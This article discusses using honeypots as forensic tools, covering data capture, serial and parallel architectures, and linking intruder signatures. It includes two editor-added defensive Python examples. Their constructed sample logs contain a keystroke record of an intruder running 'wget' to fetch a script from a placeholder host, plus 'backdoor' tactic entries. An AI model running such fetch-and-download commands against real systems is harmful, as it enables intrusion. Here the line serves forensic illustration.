AN IMPLEMENTATION OF NETWORK FORENSICS TOOL FOR INFORMATION SECURITY
By: S. MYTHILI
Posted: Oct 03, 2010
Introduction
There are two primary reasons for gathering information about computer crimes. First, information is gathered to allow criminals to be prosecuted in court. Second, information is gathered that will help create counter-measures to prevent crimes. This is the goal of deception technology such as Honey pots. In this paper, we address some specific ways these two information-gathering technologies can be combined.
Background
For years, computer and network security experts (white hats) have fought to stay ahead of computer criminals (black hats). As black hats became more skilled and computers became more powerful, conventional security measures became less effective. This perpetual action-response cycle evolved into a new field of study known as Computer and Network Forensics (CNF). CNF is the art of discovery and retrieval of information about computer related crime in such a way that the gathered information is admissible in court.
There are two sides to CNF efforts. The first is to assess the impact of the malicious or suspect act or acts. In order to bring a computer criminal to justice, it must be possible to show that sufficient damage has been done so that the act can be accurately classified as a crime. Often, there is an economic threshold associated with statutes that govern computer crime. The second part is to gather information that legally binds the act or acts that caused the damage to the perpetrator. This is the better known aspect of computer crime investigation; the standard “Who dun’ it” component.
In response to innovative computer criminals, CNF techniques have become highly sophisticated and CNF tools are increasingly effective. In addition to putting computer criminals in jail, CNF techniques have enabled white hats to learn valuable information about black hats’ techniques and methods and to formulate protection and defense mechanisms, tools, and techniques.
Until recently, the relationship between CNF and mainstream computer and network security techniques has been vague at best. By their nature, security efforts traditionally depend on actions that are taken before an attack to protect resources or information from malicious access or use. This is done through access control techniques, encryption, and vulnerability assessment mechanisms. More recently, significant effort has been focused on providing attack detection and response technology that works during suspected attacks to protect resources.
Alternatively, CNF traditionally has had a different focus from both of these two perspectives. First, CNF is concerned with gathering information about attacks and perpetrators rather than directly protecting resources or information. Consequently, the second fundamental difference is that CNF has historically dedicated its efforts to actions taken after-the-fact, i.e. after malicious or suspicious activity has occurred, rather than activity that occurs before or during attacks.
An early effort to systematically connect CNF and security was given. That work fundamentally extended the scope of CNF by proposing policies and techniques that could be implemented before an attack occurred that facilitate the CNF effort both during and after malicious or suspicious activity occurred. This paper is an extension of that idea based on using independently implemented systems to gather information that enable CNF experts to put computer criminals that attack production systems into jail.
Deception technology is well known in the security practitioner arena [DTHP] and a mathematical foundation for its effectiveness has been prescribed. The related concepts of deception security, Honey pots, and Honeynets [HN] have been the subject of organized investigation for several years. We coin the term “Honeytraps” to reflect the tools that fall into any of these categories.
Honeytraps allow us to collect information about black hat activities without putting a real system at risk. In this paper we show how honeytrap technology can be a valuable element of a forensic tool.
HONEYTRAPS
Honeytraps are systems (Honey pots or Honeynets) that are designed to be compromised. Honeypots are host systems that attract intruders to enter the host by emulating a known vulnerability. Essentially, they are modified production systems that create contained environments where intruder actions can be more safely monitored and documented. Their main goal is to capture and analyze data in order to learn about the blackhat community.
(Footnote on “attract”: We intend to convey a soft interpretation of “attraction” here. The notion of attracting intruders is counterproductive in most senses. We address the specifics of how and why this is true later in the paper.)
Honeynets, on the other hand, are a network of interconnected production and honeypot nodes. They protect the production resource only by distracting the intruder from the real target. Like Honeypots, Honeynets are designed to collect information from intruders and attempted intruders while containing the operations that these intruders can perform.
PITFALLS OF HONEYTRAPS
There are several potential pitfalls of honeytraps, one based on the foundational goal of being a system that is established to be compromised. A concern is that once an intruder enters the honeytrap, they may be able to utilize some component of the honeytrap for an illicit purpose, e.g. as a zombie in a distributed denial of service attack. Containment involves the policies, architecture, procedures, and techniques taken by a honeytrap creator to protect against such an occurrence.
A second concern is that once the blackhat enters the honeytrap, they may be able to attack the honeytrap itself, shielding their actions from the designed honeytrap monitors or by destroying or modifying the honeytrap activity logs. There are many discussions of how to avoid these and other honeytrap pitfalls in the literature and on relevant web pages. For the purposes of this paper, we posit without proof, that these pitfalls can be effectively overcome.
Data Capture
Once a blackhat penetrates a honeytrap, there must be mechanisms in place to detect and record the actions that the intruder takes. Detecting and recording that activity is termed Data Capture. Data Capture should record every possible aspect of the blackhat activity, from keystrokes to transmitted packets. The purpose of data capture is to collect data to determine tools, tactics, habits, and motives of specific blackhats, and of the blackhat community [KEH].
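The paper later requires that captured data be routed to a protected system “to ensure the integrity of the data”, which matters because the capture must survive an intruder who tries to modify or destroy the activity logs (the second pitfall above). The following added example, which is not part of the original paper and is written by the editor, shows one way to make a Data Capture record tamper-evident: each captured event is hashed together with the hash of the previous record, so altering or deleting any record breaks every later link. The event records and addresses are constructed sample data.

```python
import copy
import hashlib
import json

# Constructed sample of captured honeytrap activity (keystrokes, logins, packets).
# Addresses use documentation ranges; none of this is real capture data.
CAPTURED_EVENTS = [
    {"ts": "2010-10-03T10:00:01Z", "src": "203.0.113.7", "kind": "login",
     "detail": "ssh user=root"},
    {"ts": "2010-10-03T10:00:09Z", "src": "203.0.113.7", "kind": "keystroke",
     "detail": "wget http://example.invalid/k.sh"},
    {"ts": "2010-10-03T10:00:12Z", "src": "203.0.113.7", "kind": "packet",
     "detail": "tcp 203.0.113.7:51234 -> 192.0.2.10:80"},
]

# Fixed hash for the link before the first record.
GENESIS = "0" * 64


def _digest(prev_hash, event):
    """Hash the previous link together with a canonical encoding of the event."""
    payload = json.dumps(event, sort_keys=True, separators=(",", ":")).encode()
    return hashlib.sha256(prev_hash.encode() + payload).hexdigest()


def build_chain(events):
    """Turn captured events into records where each record commits to the one before it.

    In a deployment the resulting records would be shipped to the separate,
    firewalled collection system the paper describes; here they stay in memory.
    """
    chain = []
    prev = GENESIS
    for seq, event in enumerate(events):
        h = _digest(prev, event)
        chain.append({"seq": seq, "prev": prev, "event": event, "hash": h})
        prev = h
    return chain


def verify_chain(chain):
    """Recompute every link. Returns (True, None) or (False, seq_of_first_bad_record)."""
    prev = GENESIS
    for rec in chain:
        if rec["prev"] != prev or _digest(prev, rec["event"]) != rec["hash"]:
            return False, rec["seq"]
        prev = rec["hash"]
    return True, None


def tamper(chain, seq, new_detail):
    """Return a copy of the chain with one event's detail edited, to exercise verification."""
    forged = copy.deepcopy(chain)
    forged[seq]["event"]["detail"] = new_detail
    return forged


if __name__ == "__main__":
    chain = build_chain(CAPTURED_EVENTS)
    print("intact chain verifies:", verify_chain(chain))
    print("edited record 1:", verify_chain(tamper(chain, 1, "ls")))
    print("record 1 deleted:", verify_chain(chain[:1] + chain[2:]))
```

The chain only detects tampering after the fact; the detection is useful because the hash of the latest record can be copied to the protected collection system as soon as it is produced, so an intruder who later rewrites the honeytrap's local log cannot make the rewritten history agree with the copy held elsewhere.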
Honeytrap Uses
Honeytraps are intended to let the blackhats in and allow them to operate in order to monitor their actions. As information is collected, blackhats are profiled and their techniques are analyzed.
Documenting Blackhat Techniques
For years whitehats have dedicated efforts and resources to study the blackhat community with the ultimate goal of learning blackhat techniques. From earlier efforts, such as hacker surveys [Me98], to the cutting edge technology such as that implemented in the honeynet project, whitehats have used their knowledge to investigate the mystery of blackhats and the working of the hacking process. In 1999, MacClure [HE99] shed some light on this subject when he documented the process of hacking by breaking it down into stages that most blackhats go through during an attack. The anatomy described by MacClure includes four stages: proving, invading, mischief, and covering tracks. Documenting the blackhats’ activities during these four stages allows us to create a signature that can be used to identify a specific blackhat.
Profiling Specific Blackhats
Through the literature produced from previous research, blackhats’ techniques, tactics, motives and psychology have been documented [KEM00]. We now use this information to create signatures to characterize specific blackhats. For example, suppose our blackhat is a script kiddy. Script kiddies are inexperienced blackhats that try to break into systems using scripts created by knowledgeable blackhats. A signature for this blackhat may include, for example, level of skill, methodology, tactics, tools, and other information such as the originating site for scripts.
Letting Them In or Inviting Them In
An essential element of deception technology is that hackers must enter the trap in order for the trap to gather information. By many reports, hacking and probing is sufficiently widespread that simply placing a computer on the Internet will naturally result in intruders entering the computer. Still, there is no guarantee that there will be enough of any interesting types of hacking in the computer to allow effective information gathering.
In order to be effective, honeytraps may need to generate hacking traffic by attracting intruders into the honeytrap. As we alluded to earlier, attracting blackhats into a honeytrap is not without risks and honeytrap operators may be liable for damage to other systems if the blackhats are able to turn the honeytrap into an attack engine.
From a forensics standpoint, attracting intruders raises legal issues as well. If the attraction is sufficiently overt, the intruder’s entry may be justified; in other words, honeytraps may be legally considered fair game to intruders. Additionally, even if the intrusion is found to be illegal, the intruder may be able to claim that the attraction of the honeytrap served as entrapment. A challenge of combining forensics and honeytrap technologies is to resolve these issues.
Honeytrap Approaches
Honeytraps are inherently flexible and can be implemented in a wide variety of ways. There are three primary considerations that guide the approach that we recommend:
1) System vulnerabilities,
2) Operating system attacks and
3) Network system attacks.
For the first, we can configure honeytraps to identify a specific vulnerability or set of vulnerabilities within a host or system. For example, the honeytrap “BackOfficer Friendly” [BOF] can be configured to emulate the specific vulnerability known as Back Orifice. When blackhats find this honeytrap and recognize that the Back Orifice vulnerability is open, BackOfficer Friendly carefully tracks their activities in the honeytrap to see how they exploit the vulnerability. The tool extends the process by assessing the impacts of the recorded actions.
In the second category, we can configure a honeytrap to mimic an operating system to determine what vulnerabilities these systems have. The honeytraps Mantrap [MT] and CyberCop [CCS] are examples of automated tools that implement honeypots that assess operating system vulnerabilities. Each of these tools can concurrently simulate multiple operating systems vulnerabilities.
In the final category, we can configure a honeytrap to simulate a network system and monitor how the system behaves and how its components interact under attack. Honeytraps are an effective technique to test changes in systems, such as the addition of new software or significant configuration changes, to determine possible risks and vulnerabilities before they are implemented in the real system.
Honeytraps Used For Forensics?
With the introduction of honeytraps, the face of information gathering changed, putting whitehats in the offensive rather than the defensive mode. The purpose of honeytraps is to gather intelligence about the enemy to learn the tools, tactics, and motives of the blackhat community [HN]. To date, the information collected in honeytraps has not been intended for presentation in court. In order to use the information collected in honeytraps to prosecute the blackhat there are numerous legal issues to deal with.
As we discussed earlier, when an intruder is attracted (no matter how subtle that attraction may be) into a honeytrap, the honeytrap owner assumes liability for the actions the intruder takes on the honeytrap.
For example, if the intruder is able to turn the honeytrap into a zombie to effect a distributed denial of service attack, the subject of that attack may claim damages from the honeytrap owner. Containment technology employing wrappers and sandbox techniques reduces the vulnerability, but is far from perfect.
Secondly, if an intruder is attracted into a honeytrap, it is unlikely that the intrusion itself can be prosecuted as a crime, even if the activity that the intruder engages after entry is clearly malicious. Proving crimes relative to invited participants is more legally complicated than for acts carried out by uninvited intruders.
Additionally, honeytraps are not real systems, they contain no valuable data, and they have no real users. As a result, there is no real economic impact and no real damage that can result from honeytrap intrusions. Honeytraps are created to be attacked, so it is unlikely that an intruder could be prosecuted for activities they undertake within a honeytrap since it would be difficult to categorize the results of their activities as a crime.
Even if a crime can be established, if the intruder was attracted into the honeytrap, there is a good chance that they will be able to employ an entrapment defense. Even subtle attractions can be used to defeat prosecution via anti-entrapment laws.
Finally, honeytrap operators must deal with legal issues related to privacy. While privacy issues are not well defined on the Internet (or in society in general) honeytrap operators may face invasion of privacy claims either in response to their attempts to prosecute intruders, or independently from malicious or non-malicious intruders that do not desire to have their activities or identities revealed.
COMPUTER AND NETWORK FORENSICS
Overview.
Computer and Network Forensics is the art of retrieving information about a crime in such a way as to make that information admissible as evidence in court. The ultimate goal of CNF is to provide sufficient evidence to allow the blackhat to be successfully prosecuted. CNF techniques are used to discover evidence in a variety of crimes ranging from theft of trade secrets, to protection of intellectual property, to general misuse of computers.
Forensics State of the Art
As we noted earlier, previous CNF efforts included only after-the-fact activities as modeled. In the traditional model, gathering potential evidence started only after an attack was detected and an investigation was set in motion. In [MY01] a variation was introduced to this cycle that allows the forensic process to be continuous.
HONEYTRAPS AS FORENSIC TOOLS
In the previous section we introduced the traditional forensic model and then described how this model changed with the additions introduced in [MY01]. In the next sections we introduce two architectures that allow honeytraps to be used as CNF tools. We show how these developments transform the forensic model to create the parallel and the serial forensic architectures. In addition, we discuss the role of honeytraps in the forensic process.
As we have noted, honeytraps are designed to provide insight into blackhat methods, tactics, and targets. To gather this information, blackhats must be tracked through the system, with every action being recorded for later analysis. This information provides a basis to determine how the blackhat works and allows the analyst to predict what this blackhat, or a class of blackhats, may do in the future.
We notice that information gathered from Honeytraps may be used to develop a profile of each blackhat that is monitored. By tracking the actions, a signature for attacks can be created that we can use to identify and prosecute the blackhat.
ARCHITECTURES
Honeytraps come in many shapes and sizes. They are highly configurable and therefore can be designed to meet the needs and capabilities of a wide variety of specific systems. Once the Honeytrap is designed, the architecture of how to connect the Honeytrap to the Internet in reference to the production system must be determined. Two architectures that facilitate the forensic investigation are the serial and parallel architectures.
Serial Architecture
The serial honeytrap architecture works by placing the honeytrap between the Internet and the production system as shown in Figure 3. In this configuration, the honeytrap acts as a firewall. All recognized users are filtered to the production system while blackhats are contained in the honeytrap. The blackhats’ activities are monitored and all the information collected is routed to another system that is protected by a firewall, to ensure the integrity of the data.
The serial architecture forces the blackhat to go through the honeytrap to attack the production system, thus exposing all attackers to the honeytrap monitoring techniques. This may also enhance tracing capability, since it may be possible to follow blackhats as they transition between the honeytrap and the production system, making it easier for the forensic investigation to match the blackhat in the honeytrap to the blackhat in the production system.
There are numerous drawbacks to the serial architecture. We first notice that it is resource intensive.
One of the important characteristics of Honeytraps is that they need not deal with real users, thus reducing the volume and complexity of monitoring. However, in the serial connection the honeytrap must handle all traffic going into the production system and reroute the authorized user to the production system. Additionally, were it easy to contain intruders in a firewall, we would not need honeytraps. This architecture runs the fundamental risk that intruders that it attracts into the honeytrap may subsequently successfully attack the production system in spite of the best containment efforts of the honeytrap.
Parallel Architecture
Alternatively, the parallel configuration allows the honeytrap to be independent of the production system as shown in Figure 4. As with the serial configuration, the information gathered about blackhat activities in the honeytrap is rerouted to a separate, protected system.
This architecture is less resource intensive so it can be implemented in a system with fewer resources. As with the serial architecture, there are several drawbacks with the parallel honeytrap architecture. The first is that for the honeytrap to be useful during the forensic process, both systems (honeytrap and production) must have been attacked independently. Configuring the honeytrap so that it is likely that an intruder would enter or probe the honeytrap before or shortly after entering the production system is tricky, and again leads us into possible entrapment scenarios.
Secondly, under the parallel honeytrap architecture it is likely to be more difficult to connect an intruder in the honeytrap to the intruder in the production system, since there is no direct connection between them as we had in the serial architecture.
THE FORENSIC INVESTIGATION
In both architectures, the forensic investigation procedure and goal are the same. The forensic investigation is broken down into two separate investigations. The first begins with the evidence collected from the honeytrap, which we will refer to as the Honeytrap Forensic Investigation (HTFI). The second investigation is based on the evidence collected from the production system, which we will refer to as the Production System Forensic Investigation (PSFI). Both investigations will produce a piece of the puzzle.
The goal in the HTFI is to produce a damage report and a signature for the blackhat. For example, suppose A is the blackhat that broke into the honeytrap, then the HTFI will produce:
1) A -> identity
2) A -> tactics
3) A -> tools
4) A -> targets
5) A -> other info
Because less information about the blackhat is available in the production system, the blackhat’s signature may only be partial. For example, suppose B is the blackhat that broke into the production system, then the PSFI might include:
1) B -> tactics
2) B -> tools
3) B -> targets
4) B -> other info
An essential element of this investigation is to determine the identity of the intruder in the production system. The PSFI provides blackhat B’s partial signature and a damage report, but not blackhat B’s identity. The HTFI establishes blackhat A’s identity, but A cannot be charged because he was in a honeytrap, so no real damage can be shown in court. So, we need the identity of blackhat B in order to charge him with the damage report.
The question is, “How can we use what we know about blackhat A to discover who blackhat B is?” The answer is that if we can show that the tactics, tools, targets, and other information signatures of intruder B are identical to those of intruder A, we may be able to make a compelling argument that A and B are the same person. If so, since the identity of intruder A is known, the match would enable the case to be pursued.
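As an added illustration of the signature construction described under “Profiling Specific Blackhats” and of the HTFI/PSFI matching just described (this code is the editor's, not part of the original paper), the following example builds the two signatures from captured activity records and compares their tactics, tools and targets components. The honeytrap records carry an identity attribute and the production records do not, mirroring the paper's point that only the HTFI yields identity. The record format (`key=value` tokens), the log lines, the addresses and the matching threshold are all constructed assumptions for the example.

```python
import re

# Constructed capture records. In the paper's terms, the first set is the HTFI
# input (honeytrap) and the second is the PSFI input (production system).
# Addresses are from documentation ranges; the "identity" token stands in for
# whatever the honeytrap's data capture was able to attribute to the intruder.
HONEYTRAP_LOG = [
    "src=198.51.100.23 tool=nmap tactic=portscan target=tcp/22,tcp/80 "
    "identity=account:kiddie42@mail.invalid",
    "src=198.51.100.23 tool=hydra tactic=bruteforce target=ssh",
    "src=198.51.100.23 tool=k.sh tactic=backdoor target=/usr/bin",
]
PRODUCTION_LOG = [
    "src=10.0.0.5 tool=nmap tactic=portscan target=tcp/22,tcp/80",
    "src=10.0.0.5 tool=hydra tactic=bruteforce target=ssh",
    "src=10.0.0.5 tool=k.sh tactic=backdoor target=/usr/bin",
]
# A second, unrelated production intrusion, used to show a non-match.
OTHER_PRODUCTION_LOG = [
    "src=10.0.0.9 tool=nikto tactic=webscan target=tcp/80",
]

FIELD = re.compile(r"(\w+)=(\S+)")


def build_signature(records):
    """Aggregate a blackhat signature (tactics, tools, targets, identity) from records.

    Corresponds to the lists "A -> tactics", "A -> tools", ... in the text; identity
    stays None when no record attributes the activity to anyone (the PSFI case).
    """
    sig = {"tactics": set(), "tools": set(), "targets": set(), "identity": None}
    for line in records:
        fields = dict(FIELD.findall(line))
        if "tactic" in fields:
            sig["tactics"].add(fields["tactic"])
        if "tool" in fields:
            sig["tools"].add(fields["tool"])
        if "target" in fields:
            sig["targets"].update(fields["target"].split(","))
        if "identity" in fields:
            sig["identity"] = fields["identity"]
    return sig


def jaccard(a, b):
    """Overlap of two sets in [0, 1]; two empty sets count as fully overlapping."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


def compare_signatures(a, b):
    """Per-component overlap. Identity is deliberately left out: the PSFI has none."""
    return {k: jaccard(a[k], b[k]) for k in ("tactics", "tools", "targets")}


def link_intruders(htfi_sig, psfi_sig, threshold=0.8):
    """Return the honeytrap identity when every compared component overlaps at least
    `threshold`, otherwise None. The threshold is an assumption of this example; a real
    investigation would weigh the components rather than apply one cut-off."""
    scores = compare_signatures(htfi_sig, psfi_sig)
    if all(score >= threshold for score in scores.values()):
        return htfi_sig["identity"]
    return None


if __name__ == "__main__":
    a = build_signature(HONEYTRAP_LOG)        # intruder A, identity known
    b = build_signature(PRODUCTION_LOG)       # intruder B, identity unknown
    print("A vs B:", compare_signatures(a, b), "->", link_intruders(a, b))
    c = build_signature(OTHER_PRODUCTION_LOG)
    print("A vs C:", compare_signatures(a, c), "->", link_intruders(a, c))
```

The match is circumstantial, as the paper's own wording (“a compelling argument that A and B are the same person”) makes clear: an identical tool set is weak evidence when the tools are common scripts, so in practice the target and tactic components, and any rarer “other info”, carry more weight than a bare overlap score.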
CONCLUSION
In this paper we present a new model for Computer and Network Forensics (CNF). We develop two architectures for utilizing deception technology (for which we coined the term Honeytraps) in CNF investigations. We give an implementation model for these architectures that illustrates how these two mutually exclusive technologies can be combined to improve Computer and Network Forensic Investigations.
BIBLIOGRAPHY
1. “Design and Implementation of a Scalable Intrusion Detection System for the Protection of Network Infrastructure”, DARPA Information Survivability Conference and Exposition 2000, Jan 25-27, 2000, Vol. 2, pp. 69-83.
2. Stuart MacClure, Joel Scambray, George Kurtz, “Hacking Exposed: Network Security Secrets and Solutions”, Osborne/McGraw-Hill, 1999.
3. Carolyn P. Meinel, “The Happy Hacker, A Guide to Mostly Harmless Computer Hacking”, 2nd Ed., Scientific American, Inc., 1998.
4. Yanet Manzano and Alec Yasinsac, “Policies to Enhance Computer and Network Forensics”, 2nd Annual IEEE Systems, Man, Cybernetics Information Assurance Workshop, June 2001.
5. Vigna and Kemmerer, “NetSTAT: A Network-based Intrusion Detection System”, Journal of Computer Security, Volume 7, Issue 1, 1999.
S. MYTHILI – About the Author:
1. Ms. S. Mythili,
Asst. Prof., Department of Computer Application,
PSGR Krishnammal College for Women, Coimbatore.
2. Ms. V. Gowrilatha,
Asst. Prof., Department of Computer Science,
KSG College of Arts & Science, Coimbatore.
Source: http://www.articlesbase.com/computer-forensics-articles/an-implementation-of-network-forensics-tool-for-information-security-3393396.html